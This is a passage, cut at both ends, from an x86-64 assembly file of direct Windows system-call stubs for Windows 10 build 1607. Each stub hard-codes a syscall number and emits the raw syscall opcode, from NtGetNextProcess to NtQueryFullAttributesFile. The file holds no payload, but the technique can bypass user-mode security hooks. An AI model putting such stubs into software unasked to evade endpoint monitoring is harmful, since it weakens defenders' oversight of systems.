_10_0_14393_sp0_windows_10_rs1_1607_NtGetContextThread ENDP
; ULONG64 __stdcall NtGetCurrentProcessorNumber( );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCurrentProcessorNumber PROC STDCALL
mov r10 , rcx
mov eax , 231
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCurrentProcessorNumber ENDP
; ULONG64 __stdcall NtGetCurrentProcessorNumberEx( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCurrentProcessorNumberEx PROC STDCALL
mov r10 , rcx
mov eax , 232
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetCurrentProcessorNumberEx ENDP
; ULONG64 __stdcall NtGetDevicePowerState( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetDevicePowerState PROC STDCALL
mov r10 , rcx
mov eax , 233
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetDevicePowerState ENDP
; ULONG64 __stdcall NtGetMUIRegistryInfo( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetMUIRegistryInfo PROC STDCALL
mov r10 , rcx
mov eax , 234
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetMUIRegistryInfo ENDP
; ULONG64 __stdcall NtGetNextProcess( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNextProcess PROC STDCALL
mov r10 , rcx
mov eax , 235
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNextProcess ENDP
; ULONG64 __stdcall NtGetNextThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNextThread PROC STDCALL
mov r10 , rcx
mov eax , 236
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNextThread ENDP
; ULONG64 __stdcall NtGetNlsSectionPtr( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNlsSectionPtr PROC STDCALL
mov r10 , rcx
mov eax , 237
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNlsSectionPtr ENDP
; ULONG64 __stdcall NtGetNotificationResourceManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNotificationResourceManager PROC STDCALL
mov r10 , rcx
mov eax , 238
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetNotificationResourceManager ENDP
; ULONG64 __stdcall NtGetWriteWatch( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtGetWriteWatch PROC STDCALL
mov r10 , rcx
mov eax , 239
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtGetWriteWatch ENDP
; ULONG64 __stdcall NtImpersonateAnonymousToken( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtImpersonateAnonymousToken PROC STDCALL
mov r10 , rcx
mov eax , 240
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtImpersonateAnonymousToken ENDP
; ULONG64 __stdcall NtImpersonateThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtImpersonateThread PROC STDCALL
mov r10 , rcx
mov eax , 241
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtImpersonateThread ENDP
; ULONG64 __stdcall NtInitializeEnclave( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtInitializeEnclave PROC STDCALL
mov r10 , rcx
mov eax , 242
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtInitializeEnclave ENDP
; ULONG64 __stdcall NtInitializeNlsFiles( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtInitializeNlsFiles PROC STDCALL
mov r10 , rcx
mov eax , 243
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtInitializeNlsFiles ENDP
; ULONG64 __stdcall NtInitializeRegistry( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtInitializeRegistry PROC STDCALL
mov r10 , rcx
mov eax , 244
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtInitializeRegistry ENDP
; ULONG64 __stdcall NtInitiatePowerAction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtInitiatePowerAction PROC STDCALL
mov r10 , rcx
mov eax , 245
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtInitiatePowerAction ENDP
; ULONG64 __stdcall NtIsSystemResumeAutomatic( );
_10_0_14393_sp0_windows_10_rs1_1607_NtIsSystemResumeAutomatic PROC STDCALL
mov r10 , rcx
mov eax , 246
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtIsSystemResumeAutomatic ENDP
; ULONG64 __stdcall NtIsUILanguageComitted( );
_10_0_14393_sp0_windows_10_rs1_1607_NtIsUILanguageComitted PROC STDCALL
mov r10 , rcx
mov eax , 247
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtIsUILanguageComitted ENDP
; ULONG64 __stdcall NtListenPort( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtListenPort PROC STDCALL
mov r10 , rcx
mov eax , 248
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtListenPort ENDP
; ULONG64 __stdcall NtLoadDriver( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadDriver PROC STDCALL
mov r10 , rcx
mov eax , 249
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadDriver ENDP
; ULONG64 __stdcall NtLoadEnclaveData( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadEnclaveData PROC STDCALL
mov r10 , rcx
mov eax , 250
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadEnclaveData ENDP
; ULONG64 __stdcall NtLoadKey( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadKey PROC STDCALL
mov r10 , rcx
mov eax , 251
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadKey ENDP
; ULONG64 __stdcall NtLoadKey2( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadKey2 PROC STDCALL
mov r10 , rcx
mov eax , 252
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadKey2 ENDP
; ULONG64 __stdcall NtLoadKeyEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadKeyEx PROC STDCALL
mov r10 , rcx
mov eax , 253
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLoadKeyEx ENDP
; ULONG64 __stdcall NtLockFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLockFile PROC STDCALL
mov r10 , rcx
mov eax , 254
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLockFile ENDP
; ULONG64 __stdcall NtLockProductActivationKeys( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLockProductActivationKeys PROC STDCALL
mov r10 , rcx
mov eax , 255
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLockProductActivationKeys ENDP
; ULONG64 __stdcall NtLockRegistryKey( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLockRegistryKey PROC STDCALL
mov r10 , rcx
mov eax , 256
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLockRegistryKey ENDP
; ULONG64 __stdcall NtLockVirtualMemory( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtLockVirtualMemory PROC STDCALL
mov r10 , rcx
mov eax , 257
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtLockVirtualMemory ENDP
; ULONG64 __stdcall NtMakePermanentObject( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtMakePermanentObject PROC STDCALL
mov r10 , rcx
mov eax , 258
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtMakePermanentObject ENDP
; ULONG64 __stdcall NtMakeTemporaryObject( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtMakeTemporaryObject PROC STDCALL
mov r10 , rcx
mov eax , 259
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtMakeTemporaryObject ENDP
; ULONG64 __stdcall NtManagePartition( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtManagePartition PROC STDCALL
mov r10 , rcx
mov eax , 260
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtManagePartition ENDP
; ULONG64 __stdcall NtMapCMFModule( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtMapCMFModule PROC STDCALL
mov r10 , rcx
mov eax , 261
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtMapCMFModule ENDP
; ULONG64 __stdcall NtMapUserPhysicalPages( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtMapUserPhysicalPages PROC STDCALL
mov r10 , rcx
mov eax , 262
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtMapUserPhysicalPages ENDP
; ULONG64 __stdcall NtModifyBootEntry( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtModifyBootEntry PROC STDCALL
mov r10 , rcx
mov eax , 263
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtModifyBootEntry ENDP
; ULONG64 __stdcall NtModifyDriverEntry( ULONG64 arg_01 );
_10_0_14393_sp0_windows_10_rs1_1607_NtModifyDriverEntry PROC STDCALL
mov r10 , rcx
mov eax , 264
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtModifyDriverEntry ENDP
; ULONG64 __stdcall NtNotifyChangeDirectoryFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeDirectoryFile PROC STDCALL
mov r10 , rcx
mov eax , 265
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeDirectoryFile ENDP
; ULONG64 __stdcall NtNotifyChangeKey( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 );
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeKey PROC STDCALL
mov r10 , rcx
mov eax , 266
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeKey ENDP
; ULONG64 __stdcall NtNotifyChangeMultipleKeys( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 );
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeMultipleKeys PROC STDCALL
mov r10 , rcx
mov eax , 267
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeMultipleKeys ENDP
; ULONG64 __stdcall NtNotifyChangeSession( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 );
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeSession PROC STDCALL
mov r10 , rcx
mov eax , 268
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtNotifyChangeSession ENDP
; ULONG64 __stdcall NtOpenEnlistment( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 269
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenEnlistment ENDP
; ULONG64 __stdcall NtOpenEventPair( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenEventPair PROC STDCALL
mov r10 , rcx
mov eax , 270
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenEventPair ENDP
; ULONG64 __stdcall NtOpenIoCompletion( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenIoCompletion PROC STDCALL
mov r10 , rcx
mov eax , 271
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenIoCompletion ENDP
; ULONG64 __stdcall NtOpenJobObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenJobObject PROC STDCALL
mov r10 , rcx
mov eax , 272
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenJobObject ENDP
; ULONG64 __stdcall NtOpenKeyEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyEx PROC STDCALL
mov r10 , rcx
mov eax , 273
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyEx ENDP
; ULONG64 __stdcall NtOpenKeyTransacted( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyTransacted PROC STDCALL
mov r10 , rcx
mov eax , 274
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyTransacted ENDP
; ULONG64 __stdcall NtOpenKeyTransactedEx( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyTransactedEx PROC STDCALL
mov r10 , rcx
mov eax , 275
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyTransactedEx ENDP
; ULONG64 __stdcall NtOpenKeyedEvent( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyedEvent PROC STDCALL
mov r10 , rcx
mov eax , 276
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenKeyedEvent ENDP
; ULONG64 __stdcall NtOpenMutant( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenMutant PROC STDCALL
mov r10 , rcx
mov eax , 277
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenMutant ENDP
; ULONG64 __stdcall NtOpenObjectAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 , ULONG64 arg_10 , ULONG64 arg_11 , ULONG64 arg_12 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenObjectAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 278
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenObjectAuditAlarm ENDP
; ULONG64 __stdcall NtOpenPartition( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenPartition PROC STDCALL
mov r10 , rcx
mov eax , 279
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenPartition ENDP
; ULONG64 __stdcall NtOpenPrivateNamespace( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenPrivateNamespace PROC STDCALL
mov r10 , rcx
mov eax , 280
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenPrivateNamespace ENDP
; ULONG64 __stdcall NtOpenProcessToken( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenProcessToken PROC STDCALL
mov r10 , rcx
mov eax , 281
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenProcessToken ENDP
; ULONG64 __stdcall NtOpenRegistryTransaction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenRegistryTransaction PROC STDCALL
mov r10 , rcx
mov eax , 282
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenRegistryTransaction ENDP
; ULONG64 __stdcall NtOpenResourceManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenResourceManager PROC STDCALL
mov r10 , rcx
mov eax , 283
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenResourceManager ENDP
; ULONG64 __stdcall NtOpenSemaphore( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSemaphore PROC STDCALL
mov r10 , rcx
mov eax , 284
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSemaphore ENDP
; ULONG64 __stdcall NtOpenSession( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSession PROC STDCALL
mov r10 , rcx
mov eax , 285
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSession ENDP
; ULONG64 __stdcall NtOpenSymbolicLinkObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSymbolicLinkObject PROC STDCALL
mov r10 , rcx
mov eax , 286
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenSymbolicLinkObject ENDP
; ULONG64 __stdcall NtOpenThread( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenThread PROC STDCALL
mov r10 , rcx
mov eax , 287
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenThread ENDP
; ULONG64 __stdcall NtOpenTimer( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenTimer PROC STDCALL
mov r10 , rcx
mov eax , 288
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenTimer ENDP
; ULONG64 __stdcall NtOpenTransaction( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenTransaction PROC STDCALL
mov r10 , rcx
mov eax , 289
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenTransaction ENDP
; ULONG64 __stdcall NtOpenTransactionManager( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenTransactionManager PROC STDCALL
mov r10 , rcx
mov eax , 290
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtOpenTransactionManager ENDP
; ULONG64 __stdcall NtPlugPlayControl( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPlugPlayControl PROC STDCALL
mov r10 , rcx
mov eax , 291
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPlugPlayControl ENDP
; ULONG64 __stdcall NtPrePrepareComplete( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrePrepareComplete PROC STDCALL
mov r10 , rcx
mov eax , 292
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrePrepareComplete ENDP
; ULONG64 __stdcall NtPrePrepareEnlistment( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrePrepareEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 293
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrePrepareEnlistment ENDP
; ULONG64 __stdcall NtPrepareComplete( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrepareComplete PROC STDCALL
mov r10 , rcx
mov eax , 294
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrepareComplete ENDP
; ULONG64 __stdcall NtPrepareEnlistment( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrepareEnlistment PROC STDCALL
mov r10 , rcx
mov eax , 295
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrepareEnlistment ENDP
; ULONG64 __stdcall NtPrivilegeCheck( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrivilegeCheck PROC STDCALL
mov r10 , rcx
mov eax , 296
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrivilegeCheck ENDP
; ULONG64 __stdcall NtPrivilegeObjectAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrivilegeObjectAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 297
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrivilegeObjectAuditAlarm ENDP
; ULONG64 __stdcall NtPrivilegedServiceAuditAlarm( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPrivilegedServiceAuditAlarm PROC STDCALL
mov r10 , rcx
mov eax , 298
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPrivilegedServiceAuditAlarm ENDP
; ULONG64 __stdcall NtPropagationComplete( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPropagationComplete PROC STDCALL
mov r10 , rcx
mov eax , 299
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPropagationComplete ENDP
; ULONG64 __stdcall NtPropagationFailed( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPropagationFailed PROC STDCALL
mov r10 , rcx
mov eax , 300
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPropagationFailed ENDP
; ULONG64 __stdcall NtPulseEvent( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtPulseEvent PROC STDCALL
mov r10 , rcx
mov eax , 301
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtPulseEvent ENDP
; ULONG64 __stdcall NtQueryBootEntryOrder( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryBootEntryOrder PROC STDCALL
mov r10 , rcx
mov eax , 302
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryBootEntryOrder ENDP
; ULONG64 __stdcall NtQueryBootOptions( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryBootOptions PROC STDCALL
mov r10 , rcx
mov eax , 303
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryBootOptions ENDP
; ULONG64 __stdcall NtQueryDebugFilterState( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDebugFilterState PROC STDCALL
mov r10 , rcx
mov eax , 304
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDebugFilterState ENDP
; ULONG64 __stdcall NtQueryDirectoryObject( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDirectoryObject PROC STDCALL
mov r10 , rcx
mov eax , 305
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDirectoryObject ENDP
; ULONG64 __stdcall NtQueryDriverEntryOrder( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDriverEntryOrder PROC STDCALL
mov r10 , rcx
mov eax , 306
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryDriverEntryOrder ENDP
; ULONG64 __stdcall NtQueryEaFile( ULONG64 arg_01 , ULONG64 arg_02 , ULONG64 arg_03 , ULONG64 arg_04 , ULONG64 arg_05 , ULONG64 arg_06 , ULONG64 arg_07 , ULONG64 arg_08 , ULONG64 arg_09 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryEaFile PROC STDCALL
mov r10 , rcx
mov eax , 307
;syscall
db 0Fh , 05h
ret
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryEaFile ENDP
; ULONG64 __stdcall NtQueryFullAttributesFile( ULONG64 arg_01 , ULONG64 arg_02 );
_10_0_14393_sp0_windows_10_rs1_1607_NtQueryFullAttributesFile PROC STDCALL
mov r10 , rcx
mov eax , 308
